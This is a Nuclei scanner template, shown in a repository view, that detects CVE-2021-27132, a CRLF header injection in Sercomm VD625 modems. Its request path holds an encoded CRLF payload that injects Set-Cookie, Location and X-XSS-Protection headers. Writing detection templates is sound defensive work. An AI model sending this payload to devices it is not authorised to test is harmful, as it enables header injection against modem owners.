nuclei-templates/cves/2021/CVE-2021-27132.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2021-03-01 14:15:30 +00:00
id: CVE-2021-27132
info:
2021-03-01 14:17:25 +00:00
name: CRLF Injection - Sercomm VD625
2021-03-01 14:15:30 +00:00
author: geeknik
severity: critical
2021-03-01 14:17:25 +00:00
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
reference:
- https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
- http://sercomm.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27132
cwe-id: CWE-74
tags: cve,cve2021,crlf,injection
2021-03-01 14:15:30 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
- type: status
status:
- 404
part: header
- type: word
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
2021-03-01 20:34:15 +00:00
- "X-XSS-Protection:0"
2021-03-01 14:15:30 +00:00
part: header
condition: and